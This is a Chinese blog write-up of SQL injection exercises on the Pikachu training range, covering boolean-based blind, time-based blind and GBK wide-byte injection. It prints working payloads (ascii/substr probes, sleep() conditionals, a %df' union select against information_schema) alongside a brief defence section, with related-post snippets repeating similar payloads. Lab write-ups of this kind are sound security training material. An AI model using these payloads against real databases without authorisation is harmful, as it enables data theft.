pikachu~~~布尔,时间,宽字节盲注

最新推荐文章于 2022-10-26 16:05:34 发布
最新推荐文章于 2022-10-26 16:05:34 发布
阅读量1.2k 收藏 7
点赞数 1
分类专栏: 渗透 pikachu 文章标签: 字符串 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_50339832/article/details/117526961
版权

目录

 

基于boolian的盲注

基于时间的盲注

wide byte注入

基于boolian的盲注

屏蔽了报错信息,只显示两种情况:正确和错误

输入单引号试探

输入and试一下

bool注入比较重要的是lenth()、substr()函数和ascii()函数这类取值和运算函数,substr()函数截取字符串的字母,通过ascii()函数转码成数字后就可以参与数学运算了。如:

select sustr(database(),1,1)>10

select ascii(sustr(database(),1,1))>10

select length(database())>10

开始注入:kobe' and ascii(substr(database(),1,1))>113#

若显示内容则后面表达式为真,否则为假

kobe' and ascii(substr(database(),1,1))=112#

 

kobe' and ascii(substr((select TABLE_NAME from INFORMATION_SCHEMA.tables where TABLE_SCHEMA=database() limit 0,1),1,1))<112#

基于时间的盲注

如果说基于bool的注入可以基于0或者1来判断注入,那基于时间的盲注就是啥也看不到,你无法从显示的不同来判断你的语句是否执行。这时可以引入基于时间的盲注。

发现输入’会立即回显报错

利用sleep()

输入kobe' and sleep(3)

发现延迟3秒显示,所以存在sql时间注入的漏洞

即后面语句猜测正确即延迟,不正确立即回显。

kobe' and if((substr(database(),1,1))='p',sleep(5),null)#

 

wide byte注入

 

输入注入字节后抓包

 

因为addslashes()函数的作用是在单引号等字符前加反斜杠('->\'),url编码后就是%5c%27.我们的payload的是【%df '】,在前面增加%df(%81-%fe之间都可),即%df%5c%27,此时数据库若使用GBK编码,则会认为%df%5c是一个宽字符,%27单引号便逃逸出来了。

order by字段查询,输入2时正常,输入3时报错,说明字段数为2

union 联合查询试下数据库:

查询表名:kobe%df' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()

查询

'users'表名旁边需要单引号,所以可以用Burp将'users'进行转换为concat(char(39),char(117),char(115),char(101),char(114),char(115),char(39))

详细:https://blog.csdn.net/weixin_44426869/article/details/104341863?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522162271214816780366593073%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fall.%2522%257D&request_id=162271214816780366593073&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~all~first_rank_v2~rank_v29-9-104341863.first_rank_v2_pc_rank_v29&utm_term=pikachu%E5%AE%BD%E5%AD%97%E8%8A%82%E6%B3%A8%E5%85%A5&spm=1018.2226.3001.4187

防御

对于宽字节编码,有一种最好的修补就是:

(1)使用mysql_set_charset(GBK)指定字符集

(2)使用mysql_real_escape_string进行转义

原理是,mysql_real_escape_string与addslashes的不同之处在于其会考虑当前设置的字符集,不会出现前面e5和5c拼接为一个宽字节的问题,但是这个“当前字符集”如何确定呢?

就是使用mysql_set_charset进行指定。

上述的两个条件是“与”运算的关系,少一条都不行。

玉米同学
关注
  • 1
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
pikachu——时间盲注
Lollipop_zhi的博客
03-02 4933
如果是布尔盲注,页面上会有0和1的变化,但是时间盲注页面无变化,所以我们需要监控时间,通过后台执行时间来判断 首先输入’测试一下,时间0毫秒 输入kobe’ and 1=1#,时间还是0毫秒 借助sleep()函数,输入kobe’ and sleep(3)#,时间发生了变化 输入kobe’ and if ((substr(database(),1,1))=‘p’,sleep=(5),null)#,产生了延迟 substr(database(),1,1):截取数据库名称的第一个字符。 判断是否.
pikachu靶场(SQL注入基于布尔盲注)python实现
最新发布
记录学习
05-20 463
用python脚本实现布尔盲注
pikachu(bool盲注)
ANYOUZHEN的博客
05-11 448
关于bool盲注的原理:由于对方后端对用户的显示页面进行了处理,我们无法看到返回的数据库报错内容 由于进行处理,我们在页面输入框中输入‘时不会返回数据库报错内容 输入kobe’ and 1=1# 我们可以使用select语句去判断: select ascii(substr(database(),1,1))>113; 它会返回0或者1,0是错的意思,1是对的意思 select ascii(substr(database(),1,1)>112; 通过判断0或者1 通过多次查询,我
pikachu盲注(base on boolian)
weixin_50339082的博客
06-15 1277
pikachu盲注(base on boolian) 发现只能存在kobe’ and 1=1 #连or 都会报错 利用and来构造payload: kobe' and ascii(substr(database(),1,1))=112# 利用burpsuit来进行测试,爆出database,不对的话就会出现用户名不存在,正确的话就会出现用户正确信息,可采用二分法来减少盲注次数。 ...
pikachu 布尔盲注
weixin_58358185的博客
10-26 856
Pikachu布尔盲注--思路
pikachu(时间盲注
ANYOUZHEN的博客
05-11 1220
pikachu基于时间盲注 我们输入' 返回I don't care 我们输入anyouzhen sakura ,同样返回I don't care 我们可以利用sleep()函数进行判断,是否存在注入点 我们输入 kobe' and sleep(5)# 查看网络,发现雀食存在5s的延迟,说明后面闭合后的内容被带入到数据库中去了 所以可以说明存在注入点,这种注入方式被称为时间盲注 基于时间的延迟: kobe' and if((substr(database(),1,1))='p',sl
pikachu LINUX安装包,
07-14
上传到根目录,解压直接就问访问,里面有教程
web渗透教程1:pikachu靶场搭建
11-17
带你手把手搭建pikachu靶场环境
pikachu靶场全部通关.pdf
08-16
由于在有道云写的,不好发博客,只能这样子,个人结合B站视频,总结
pikachu-master
05-04
pikachu漏洞测试平台搭建
pikachu-master.zip
06-25
Pikachu靶场:全面理解与提升网络安全技能》 "Pikachu-master.zip"这个压缩包文件,无疑为我们提供了一个宝贵的网络安全学习资源——Pikachu靶场。靶场,是网络安全领域中的一个重要概念,它模拟真实网络环境,让...
pikachu——布尔盲注
Lollipop_zhi的博客
03-02 6507
基于boolean的盲注主要表现: 1.没有报错信息 2.不管是正确的输入,还是错误的输入,都只显示两种情况(我们可以认为是0或者1) 3.在正确的输入下,输入and 1=1/and 1= 2发现可以判断 首先用’来测试一下 然后输入kobe’ and 1=1#,当改成1=2时,显示“不存在”。此时,说明存在SQL注入点,因为会把我们输入的 1=1,1=2执行 输入kobe’ and ascii(substr(database(),1,1))>113# 显示“不存在” (因为手工
pikachu SQL 注入(盲注
weixin_60508121的博客
04-19 3695
SQL盲注 1.判断是否存在注入点 kobe' and 1=1# 正常返回结果 kobe' and 1=2# 返回空结果 2 2.猜测数据库长度(burp探测) kobe' and length(database())>=k # 数据库的长度为7 2. 猜测数据库名 kobe' and (select substr(database(),1,1))='k'# 得到数据库名为pikachu 3.盲注表名猜测 kobe' and length((sele..
[Pikachu靶场实战系列] SQL注入(盲注
00勇士王子的博客
07-29 3114
目录盲注布尔盲注时间盲注 盲注 盲注的意思就是说页面没有明显的回显,我们只能通过其他方式判断注入点。 常见的方式有两种,一种是布尔盲注,通过页面返回的不同状态判断语句是否被执行。另一种是时间盲注,通过页面加载时间来判断语句是否被执行。 布尔盲注 先输入一个之前关卡中的名字,返回正常 加上单引号,并没有报错,而是返回了我输入的信息不存在 加上注释符号后,返回又正常了,说明注入点存在,且就是单引号闭合 判断数据库名的长度 lucy’and length(database())>=1 # l
实验15:sql盲注原理及基于boolean的盲注
qq_44720671的博客
04-07 541
sql盲注原理及基于boolean的盲注 盲注: 有时,后台用错误消息屏蔽方法屏蔽报错,无法根据报错信息来判断注入,这种情况的注入叫做盲注盲注分为based boolean(基于真假)和based time(基于时间) 两种 本章我们学习的是基于真假的盲注——based boolean 特征: 1、无报错信息 2、无论对错只有两种情况(如:0或1) 3、正确时输入and 1=1或and 1=2...
SQL注入——基于Boolean的盲注
yuan114012的博客
05-20 842
一.基于Boolean的盲注 使用场景:没有数据回显,条件正确有结果错误没有结果 利用方式:构造判断条件逐个猜测、 1.所需语法与函数 database() #获取当前数据库的名字 length(str) #计算 str 的长度 substr(str,起始位,截取位数) group_concat(列名) #把某列的全部值输出到一行,默认用逗号分隔 二、举例说明 基于Boolean的盲注,以...
sqli-labs Less-8 Blind-- Boolian Based基于布尔盲注
bigblue00的博客
06-16 404
Less-8 Blind-- Boolian Based基于布尔盲注 1、回显分析 当输入的语句正确时,显示 You are in… 当输入的语句异常时,不显示任何信息 2、SQL盲注 根据页面的显示情况会有不同,可以构造判断语句,当语句成立时,显示You are in… 当语句不成立时,不显示任何信息。 先判断数据库名的长度: http://192.168.195.110/sqli-labs/Less-8/?id=1’and (length(database())>10) – + 页面无信息显示,
pikachusql注入
weixin_38720471的博客
01-07 3773
** 1原理 ** SQL注入漏洞主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。 从而导致数据库受损(被脱裤、被删除、甚至整个服务器权限沦陷)。 2数字注入 让id=true,从而使sql语句在查询时,id可以查询所有值 3字符注入 3.1原理:首先用 ’ 判断是否存在字符注入的漏洞 。因为在sql语句中 多个’会造成sql语句错误(结合sql语句),若加单引号后显示sql运行错误 ,则存在此

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值